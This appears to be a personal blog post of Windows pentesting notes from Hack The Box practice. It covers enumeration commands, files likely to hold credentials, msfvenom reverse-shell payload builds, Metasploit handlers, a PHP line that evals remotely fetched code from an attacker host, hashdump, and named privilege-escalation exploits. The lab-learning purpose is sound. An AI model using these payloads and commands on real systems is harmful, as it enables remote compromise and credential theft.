A journey into Windows pentesting.

I did root many windows rig in the last week.  You can practice your skill too, just go to hackthebox.eu.  Here i will not tell you how specificity root those vulnerable windows os, i just want to keep some of the basics that i learned from this.

As expected the info gathering is the same nmap nikto dirb etc.

The windows command line, as i am used to unix bash this command line was like Korean to me.

Here are the basic commands that are useful :

 cat equivalent is type
ls is dir
systeminfo to use with windows vuln finder and know more about device you are hacking
sc to start and close service
search function is find

Inside the rig there are command to do some more gathering :

>whoami
>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
condensated systeminfo
>hostname
>echo %username%
>net user
>ipconfig /all
>arp -A
>route print
>netstat -ano and netsh firewall show state
see active network connection and firewall rules
>schtasks /query /fo LIST /v
display shitload of scheduled task
>tasklist /SVC
links running processes to started services
>net start
To see windows services started
>DRIVERQUERY
Show all maybe vunl. drivers and their date of birth

Sometime you can find info inside those, good idea to check :

c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

To facilitate the work and find evident vulns we can use wmic, this way we can find witch patches are used on the rig :

wmic qfe get Caption,Description,HotFixID,InstalledOn

howto gain meterpreter shell :
One machine have his ftp open to anonymous connection so

msfvenom -f aspx -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4443 -e x86/shikata_ga_nai -o exploit.aspx

Other practical msfvenom payload :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

PHP :

use exploit/multi/script/web_delivery
set target 1
set lhost x.x.x.x
set payload php/meterpreter/reverse_tcp
run

Vuln.php

<?php eval(file_get_contents('http://MYIP:8080/xxxxxxxxx')); ?>

Basic remote handler :

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

(see https://netsec.ws/?p=331 for other good windows payload)

Those are some vuln that gave me shell : ms10_015_kitrap0d, rejetto_hfs_exec escalation ms16_032_secondary_logon_hanle_privesc, ScStoragePathFromUrl then reverse shell.exe somewere and then ms14_058_track_popup_menu, EthernalBlue.

Next we gain a meterpreter we can use it for more information gathering:

meterpreter >getuid
meterpreter >sysinfo
meterpreter >ipconfig
meterpreter >search -f *.txt
meterpreter >use post/multi/recon/local_exploit_suggester
meterpreter >use post/windows/gather/enum_patches
meterpreter >use post/windows/gather/enum_applications 
meterpreter >hashdump

Last thing is windows-exploit-sugggester.py, you feed it with the full systeminfo and it give you exploit the same way metasploit local exploit suggester.

./windows-exploit-suggester.py --update
sudo apt-get install python-xlrd
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt

Some ressources :
http://www.fuzzysecurity.com/tutorials/16.html
Easy Remote Shells with Web Delivery
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

For safekeep : https://www.ambionics.io/blog/drupal-services-module-rce

Leave a Reply

Your email address will not be published.